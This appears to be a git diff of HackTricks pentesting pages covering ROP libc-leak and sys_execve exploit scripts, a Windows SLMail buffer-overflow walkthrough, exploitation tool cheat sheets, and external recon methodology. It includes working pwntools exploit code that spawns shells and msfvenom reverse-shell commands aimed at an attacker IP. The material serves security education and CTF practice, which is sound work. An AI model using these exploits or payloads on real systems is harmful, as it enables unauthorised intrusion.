@ -256,7 +254,7 @@ rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
p.clean() p.clean()
p.sendline(rop2) p.sendline(rop2)
##### Interact with the shell ##### #### Interact with the shell #####
p.interactive() #Interact with the conenction p.interactive() #Interact with the conenction
``` ```
@ -268,7 +266,7 @@ Finally, the **address of exit function** is **called** so the process **exists
![](<../../../.gitbook/assets/image (143).png>) ![](<../../../.gitbook/assets/image (143).png>)
## 4(2)- Using ONE\_GADGET # 4(2)- Using ONE\_GADGET
You could also use [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**. \ You could also use [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**. \
However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided. However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
@ -280,7 +278,7 @@ ONE_GADGET = libc.address + 0x4526a
rop2 = base + p64(ONE_GADGET) + "\x00"*100 rop2 = base + p64(ONE_GADGET) + "\x00"*100
``` ```
## EXPLOIT FILE # EXPLOIT FILE
You can find a template to exploit this vulnerability here: You can find a template to exploit this vulnerability here:
@ -288,9 +286,9 @@ You can find a template to exploit this vulnerability here:
[rop-leaking-libc-template.md](rop-leaking-libc-template.md) [rop-leaking-libc-template.md](rop-leaking-libc-template.md)
{% endcontent-ref %} {% endcontent-ref %}
## Common problems # Common problems
### MAIN\_PLT = elf.symbols\['main'] not found ## MAIN\_PLT = elf.symbols\['main'] not found
If the "main" symbol does not exist. Then you can just where is the main code: If the "main" symbol does not exist. Then you can just where is the main code:
@ -306,11 +304,11 @@ and set the address manually:
MAIN_PLT = 0x401080 MAIN_PLT = 0x401080
``` ```
### Puts not found ## Puts not found
If the binary is not using Puts you should check if it is using If the binary is not using Puts you should check if it is using
### `sh: 1: %s%s%s%s%s%s%s%s: not found` ## `sh: 1: %s%s%s%s%s%s%s%s: not found`
If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found` If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`

View file

@ -17,16 +17,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# ROP - Leaking LIBC template
{% code title="template.py" %} {% code title="template.py" %}
```python ```python
from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools
#################### ###################
#### CONNECTION #### ### CONNECTION ####
#################### ###################
LOCAL = False LOCAL = False
REMOTETTCP = True REMOTETTCP = True
REMOTESSH = False REMOTESSH = False
@ -61,9 +59,9 @@ if GDB and not REMOTETTCP and not REMOTESSH:
########################## #########################
##### OFFSET FINDER ###### #### OFFSET FINDER ######
########################## #########################
OFFSET = b"" #b"A"*264 OFFSET = b"" #b"A"*264
if OFFSET == b"": if OFFSET == b"":
@ -79,9 +77,9 @@ if OFFSET == b"":
##################### ####################
#### Find Gadgets ### ### Find Gadgets ###
##################### ####################
try: try:
libc_func = "puts" libc_func = "puts"
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
@ -99,9 +97,9 @@ log.info("pop rdi; ret gadget: " + hex(POP_RDI))
log.info("ret gadget: " + hex(RET)) log.info("ret gadget: " + hex(RET))
######################### ########################
#### Find LIBC offset ### ### Find LIBC offset ###
######################### ########################
def generate_payload_aligned(rop): def generate_payload_aligned(rop):
payload1 = OFFSET + rop payload1 = OFFSET + rop
@ -157,11 +155,11 @@ get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
############################## #############################
##### FINAL EXPLOITATION ##### #### FINAL EXPLOITATION #####
############################## #############################
### Via One_gadget (https://github.com/david942j/one_gadget) ## Via One_gadget (https://github.com/david942j/one_gadget)
# gem install one_gadget # gem install one_gadget
def get_one_gadgets(libc): def get_one_gadgets(libc):
import string, subprocess import string, subprocess
@ -183,7 +181,7 @@ if USE_ONE_GADGET:
if one_gadgets: if one_gadgets:
rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
### Normal/Long exploitation ## Normal/Long exploitation
if not rop2: if not rop2:
BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
SYSTEM = LIBC.sym["system"] SYSTEM = LIBC.sym["system"]
@ -205,9 +203,9 @@ P.interactive() #Interact with your shell :)
``` ```
{% endcode %} {% endcode %}
## Common problems # Common problems
### MAIN\_PLT = elf.symbols\['main'] not found ## MAIN\_PLT = elf.symbols\['main'] not found
If the "main" symbol does not exist. Then you can just where is the main code: If the "main" symbol does not exist. Then you can just where is the main code:
@ -223,11 +221,11 @@ and set the address manually:
MAIN_PLT = 0x401080 MAIN_PLT = 0x401080
``` ```
### Puts not found ## Puts not found
If the binary is not using Puts you should check if it is using If the binary is not using Puts you should check if it is using
### `sh: 1: %s%s%s%s%s%s%s%s: not found` ## `sh: 1: %s%s%s%s%s%s%s%s: not found`
If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found` If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`

View file

@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# ROP - call sys\_execve
In order to prepare the call for the **syscall** it's needed the following configuration: In order to prepare the call for the **syscall** it's needed the following configuration:
* `rax: 59 Specify sys_execve` * `rax: 59 Specify sys_execve`
@ -28,7 +26,7 @@ In order to prepare the call for the **syscall** it's needed the following confi
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack).
## Control the registers # Control the registers
Let's start by finding **how to control those registers**: Let's start by finding **how to control those registers**:
@ -42,9 +40,9 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
With these addresses it's possible to **write the content in the stack and load it into the registers**. With these addresses it's possible to **write the content in the stack and load it into the registers**.
## Write string # Write string
### Writable memory ## Writable memory
Frist you need to find a writable place in the memory Frist you need to find a writable place in the memory
@ -57,7 +55,7 @@ Start End Offset Perm Path
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap] 0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
``` ```
### Write String ## Write String
Then you need to find a way to write arbitrary content in this address Then you need to find a way to write arbitrary content in this address
@ -66,7 +64,7 @@ ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
``` ```
#### 32 bits ### 32 bits
```python ```python
''' '''
@ -90,7 +88,7 @@ rop += p32(0x6b6000 + 4)
rop += writeGadget rop += writeGadget
``` ```
#### 64 bits ### 64 bits
```python ```python
''' '''
@ -108,7 +106,7 @@ rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx rop += writeGadget #Address to: mov qword ptr [rax], rdx
``` ```
## Example # Example
```python ```python
from pwn import * from pwn import *
@ -177,7 +175,7 @@ target.sendline(payload)
target.interactive() target.interactive()
``` ```
## References # References
* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html) * [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html)

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Exploiting Tools # Metasploit
## Metasploit
``` ```
pattern_create.rb -l 3000 #Length pattern_create.rb -l 3000 #Length
@ -29,27 +27,27 @@ nasm> jmp esp #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01 msfelfscan -j esi /opt/fusion/bin/level01
``` ```
### Shellcodes ## Shellcodes
``` ```
msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
``` ```
## GDB # GDB
### Install ## Install
``` ```
apt-get install gdb apt-get install gdb
``` ```
### Parameters ## Parameters
**-q** --> No show banner\ **-q** --> No show banner\
**-x \<file>** --> Auto-execute GDB instructions from here\ **-x \<file>** --> Auto-execute GDB instructions from here\
**-p \<pid>** --> Attach to process **-p \<pid>** --> Attach to process
#### Instructions ### Instructions
\> **disassemble main** --> Disassemble the function\ \> **disassemble main** --> Disassemble the function\
\> **disassemble 0x12345678**\ \> **disassemble 0x12345678**\
@ -92,7 +90,7 @@ apt-get install gdb
* **x/xw \&pointer** --> Address where the pointer is located * **x/xw \&pointer** --> Address where the pointer is located
* **x/i $eip** —> Instructions of the EIP * **x/i $eip** —> Instructions of the EIP
### [GEF](https://github.com/hugsy/gef) ## [GEF](https://github.com/hugsy/gef)
```bash ```bash
checksec #Check protections checksec #Check protections
@ -124,9 +122,9 @@ gef➤ pattern search 0x6261617762616176
[+] Found at offset 184 (little-endian search) likely [+] Found at offset 184 (little-endian search) likely
``` ```
### Tricks ## Tricks
#### GDB same addresses ### GDB same addresses
While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing: While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
@ -136,7 +134,7 @@ While debugging GDB will have **slightly different addresses than the used by th
* Exploit the binary using the same absolute route * Exploit the binary using the same absolute route
* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary * `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
#### Backtrace to find functions called ### Backtrace to find functions called
When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.\ When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.\
You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called: You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called:
@ -150,13 +148,13 @@ gef➤ bt
#4 0x0000000000400a5a in ?? () #4 0x0000000000400a5a in ?? ()
``` ```
### GDB server ## GDB server
`gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine) `gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine)
## Ghidra # Ghidra
### Find stack offset ## Find stack offset
**Ghidra** is very useful to find the the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\ **Ghidra** is very useful to find the the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\
For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\ For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\
@ -164,7 +162,7 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
![](<../../.gitbook/assets/image (616).png>) ![](<../../.gitbook/assets/image (616).png>)
## GCC # GCC
**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections\ **gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections\
**-o** --> Output\ **-o** --> Output\
@ -175,7 +173,7 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
**nasm -f elf assembly.asm** --> return a ".o"\ **nasm -f elf assembly.asm** --> return a ".o"\
**ld assembly.o -o shellcodeout** --> Executable **ld assembly.o -o shellcodeout** --> Executable
## Objdump # Objdump
**-d** --> **Disassemble executable** sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)\ **-d** --> **Disassemble executable** sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)\
**-Mintel** --> **Intel** syntax\ **-Mintel** --> **Intel** syntax\
@ -188,13 +186,13 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
**ojdump -t --dynamic-relo ./exec | grep puts** --> Address of "puts" to modify in GOT\ **ojdump -t --dynamic-relo ./exec | grep puts** --> Address of "puts" to modify in GOT\
**objdump -D ./exec | grep "VAR\_NAME"** --> Address or a static variable (those are stored in DATA section). **objdump -D ./exec | grep "VAR\_NAME"** --> Address or a static variable (those are stored in DATA section).
## Core dumps # Core dumps
1. Run `ulimit -c unlimited` before starting my program 1. Run `ulimit -c unlimited` before starting my program
2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` 2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t`
3. sudo gdb --core=\<path/core> --quiet 3. sudo gdb --core=\<path/core> --quiet
## More # More
**ldd executable | grep libc.so.6** --> Address (if ASLR, then this change every time)\ **ldd executable | grep libc.so.6** --> Address (if ASLR, then this change every time)\
**for i in \`seq 0 20\`; do ldd \<Ejecutable> | grep libc; done** --> Loop to see if the address changes a lot\ **for i in \`seq 0 20\`; do ldd \<Ejecutable> | grep libc; done** --> Loop to see if the address changes a lot\
@ -204,16 +202,16 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
**strace executable** --> Functions called by the executable\ **strace executable** --> Functions called by the executable\
**rabin2 -i ejecutable -->** Address of all the functions **rabin2 -i ejecutable -->** Address of all the functions
## **Inmunity debugger** # **Inmunity debugger**
```bash ```bash
!mona modules #Get protections, look for all false except last one (Dll of SO) !mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP) !mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
``` ```
## IDA # IDA
### Debugging in remote linux ## Debugging in remote linux
Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux\_server_ or _linux\_server64_ inside the linux server and run it nside the folder that contains the binary: Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux\_server_ or _linux\_server64_ inside the linux server and run it nside the folder that contains the binary:

View file

@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# PwnTools
``` ```
pip3 install pwntools pip3 install pwntools
``` ```
## Pwn asm # Pwn asm
Get opcodes from line or file. Get opcodes from line or file.
@ -39,7 +37,7 @@ pwn asm -i <filepath>
* avoid bytes (new lines, null, a list) * avoid bytes (new lines, null, a list)
* select encoder debug shellcode using gdb run the output * select encoder debug shellcode using gdb run the output
## **Pwn checksec** # **Pwn checksec**
Checksec script Checksec script
@ -47,9 +45,9 @@ Checksec script
pwn checksec <executable> pwn checksec <executable>
``` ```
## Pwn constgrep # Pwn constgrep
## Pwn cyclic # Pwn cyclic
Get a pattern Get a pattern
@ -65,7 +63,7 @@ pwn cyclic -l faad
* context (16,32,64,linux,windows...) * context (16,32,64,linux,windows...)
* Take the offset (-l) * Take the offset (-l)
## Pwn debug # Pwn debug
Attach GDB to a process Attach GDB to a process
@ -81,7 +79,7 @@ pwn debug --process bash
* gdbscript to execute * gdbscript to execute
* sysrootpath * sysrootpath
## Pwn disablenx # Pwn disablenx
Disable nx of a binary Disable nx of a binary
@ -89,7 +87,7 @@ Disable nx of a binary
pwn disablenx <filepath> pwn disablenx <filepath>
``` ```
## Pwn disasm # Pwn disasm
Disas hex opcodes Disas hex opcodes
@ -103,7 +101,7 @@ pwn disasm ffe4
* base addres * base addres
* color(default)/no color * color(default)/no color
## Pwn elfdiff # Pwn elfdiff
Print differences between 2 fiels Print differences between 2 fiels
@ -111,7 +109,7 @@ Print differences between 2 fiels
pwn elfdiff <file1> <file2> pwn elfdiff <file1> <file2>
``` ```
## Pwn hex # Pwn hex
Get hexadecimal representation Get hexadecimal representation
@ -119,7 +117,7 @@ Get hexadecimal representation
pwn hex hola #Get hex of "hola" ascii pwn hex hola #Get hex of "hola" ascii
``` ```
## Pwn phd # Pwn phd
Get hexdump Get hexdump
@ -133,11 +131,11 @@ pwn phd <file>
* Number of bytes per line highlight byte * Number of bytes per line highlight byte
* Skip bytes at beginning * Skip bytes at beginning
## Pwn pwnstrip # Pwn pwnstrip
## Pwn scrable # Pwn scrable
## Pwn shellcraft # Pwn shellcraft
Get shellcodes Get shellcodes
@ -164,7 +162,7 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
* list possible shellcodes * list possible shellcodes
* Generate ELF as a shared library * Generate ELF as a shared library
## Pwn template # Pwn template
Get a python template Get a python template
@ -174,7 +172,7 @@ pwn template
**Can select:** host, port, user, pass, path and quiet **Can select:** host, port, user, pass, path and quiet
## Pwn unhex # Pwn unhex
From hex to string From hex to string
@ -182,7 +180,7 @@ From hex to string
pwn unhex 686f6c61 pwn unhex 686f6c61
``` ```
## Pwn update # Pwn update
To update pwntools To update pwntools

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Windows Exploiting (Basic Guide - OSCP lvl) # **Start installing the SLMail service**
## **Start installing the SLMail service** # Restart SLMail service
## Restart SLMail service
Every time you need to **restart the service SLMail** you can do it using the windows console: Every time you need to **restart the service SLMail** you can do it using the windows console:
@ -31,7 +29,7 @@ net start slmail
![](<../.gitbook/assets/image (23).png>) ![](<../.gitbook/assets/image (23).png>)
## Very basic python exploit template # Very basic python exploit template
```python ```python
#!/usr/bin/python #!/usr/bin/python
@ -55,11 +53,11 @@ except:
print "Could not connect to "+ip+":"+port print "Could not connect to "+ip+":"+port
``` ```
## **Change Immunity Debugger Font** # **Change Immunity Debugger Font**
Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK` Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
## **Attach the proces to Immunity Debugger:** # **Attach the proces to Immunity Debugger:**
**File --> Attach** **File --> Attach**
@ -67,13 +65,13 @@ Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
**And press START button** **And press START button**
## **Send the exploit and check if EIP is affected:** # **Send the exploit and check if EIP is affected:**
![](<../.gitbook/assets/image (25).png>) ![](<../.gitbook/assets/image (25).png>)
Every time you break the service you should restart it as is indicated in the beginnig of this page. Every time you break the service you should restart it as is indicated in the beginnig of this page.
## Create a pattern to modify the EIP # Create a pattern to modify the EIP
The pattern should be as big as the buffer you used to broke the service previously. The pattern should be as big as the buffer you used to broke the service previously.
@ -113,7 +111,7 @@ With this buffer the EIP crashed should point to 42424242 ("BBBB")
Looks like it is working. Looks like it is working.
## Check for Shellcode space inside the stack # Check for Shellcode space inside the stack
600B should be enough for any powerfull shellcode. 600B should be enough for any powerfull shellcode.
@ -133,7 +131,7 @@ You can see that when the vulnerability is reached, the EBP is pointing to the s
In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough. In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough.
## Check for bad chars # Check for bad chars
Change again the buffer: Change again the buffer:
@ -173,7 +171,7 @@ In this case you can see that **the char 0x0D is avoided**:
![](<../.gitbook/assets/image (34).png>) ![](<../.gitbook/assets/image (34).png>)
## Find a JMP ESP as a return address # Find a JMP ESP as a return address
Using: Using:
@ -204,7 +202,7 @@ Now, inside this memory you should find some JMP ESP bytes, to do that execute:
**In this case, for example: **_**0x5f4a358f**_ **In this case, for example: **_**0x5f4a358f**_
## Create shellcode # Create shellcode
``` ```
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d' msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
@ -268,7 +266,7 @@ except:
There are shellcodes that will **overwrite themselves**, therefore it's important to always add some NOPs before the shellcode There are shellcodes that will **overwrite themselves**, therefore it's important to always add some NOPs before the shellcode
{% endhint %} {% endhint %}
## Improving the shellcode # Improving the shellcode
Add this parameters: Add this parameters:

View file

@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# External Recon Methodology
{% hint style="danger" %} {% hint style="danger" %}
Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**? Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?
[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!** [**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
@ -27,7 +25,7 @@ Do you use **Hacktricks every day**? Did you find the book **very** **useful**?
If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
## Assets discoveries # Assets discoveries
> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns. > So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns.
@ -38,7 +36,7 @@ The goal of this phase is to obtain all the **companies owned by the main compan
3. Use reverse whois lookups to search for other entries \(organisation names, domains...\) related to the first one \(this can be done recursively\) 3. Use reverse whois lookups to search for other entries \(organisation names, domains...\) related to the first one \(this can be done recursively\)
4. Use other techniques like shodan `org`and `ssl`filters to search for other assets \(the `ssl` trick can be done recursively\). 4. Use other techniques like shodan `org`and `ssl`filters to search for other assets \(the `ssl` trick can be done recursively\).
### Acquisitions ## Acquisitions
First of all, we need to know which **other companies are owned by the main company**. First of all, we need to know which **other companies are owned by the main company**.
One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com/), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one. One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com/), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.
@ -46,7 +44,7 @@ Other option is to visit the **Wikipedia** page of the main company and search f
> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets. > Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets.
### ASNs ## ASNs
An autonomous system number \(**ASN**\) is a **unique number** assigned to an **autonomous system** \(AS\) by the **Internet Assigned Numbers Authority \(IANA\)**. An autonomous system number \(**ASN**\) is a **unique number** assigned to an **autonomous system** \(AS\) by the **Internet Assigned Numbers Authority \(IANA\)**.
An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators. An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators.
@ -64,13 +62,13 @@ amass intel -asn 8911,50313,394161
You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com/) \(it has free API\). You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com/) \(it has free API\).
You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com/). You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com/).
### Looking for vulnerabilities ## Looking for vulnerabilities
At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** \(Nessus, OpenVAS\) over all the hosts. At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** \(Nessus, OpenVAS\) over all the hosts.
Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running**. Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running**.
Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce** services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce** services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
## Domains # Domains
> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope. > We know all the companies inside the scope and their assets, it's time to find the domains inside the scope.
@ -78,7 +76,7 @@ _Please, note that in the following purposed techniques you can also find subdom
First of all you should look for the **main domain**\(s\) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_. First of all you should look for the **main domain**\(s\) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_.
### Reverse DNS ## Reverse DNS
As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server \(1.1.1.1, 8.8.8.8\) As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server \(1.1.1.1, 8.8.8.8\)
@ -92,7 +90,7 @@ dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns
For this to work, the administrator has to enable manually the PTR. For this to work, the administrator has to enable manually the PTR.
You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com/) You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com/)
### Reverse Whois \(loop\) ## Reverse Whois \(loop\)
Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** \(for example other whois registries where the same email appears\). Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** \(for example other whois registries where the same email appears\).
You can use online tools like: You can use online tools like:
@ -110,7 +108,7 @@ You can also perform some automatic reverse whois discovery with [amass](https:/
**Note that you can use this technique to discover more domain names every time you find a new domain.** **Note that you can use this technique to discover more domain names every time you find a new domain.**
### Trackers ## Trackers
If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**. If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.
For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages. For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages.
@ -122,7 +120,7 @@ There are some pages that let you search by these trackers and more:
* [**Publicwww**](https://publicwww.com/) * [**Publicwww**](https://publicwww.com/)
* [**SpyOnWeb**](http://spyonweb.com/) * [**SpyOnWeb**](http://spyonweb.com/)
### **Favicon** ## **Favicon**
Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Heres how to use it: Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Heres how to use it:
@ -135,38 +133,38 @@ python3 favihash.py -f https://target/favicon.ico -t targets.txt -s
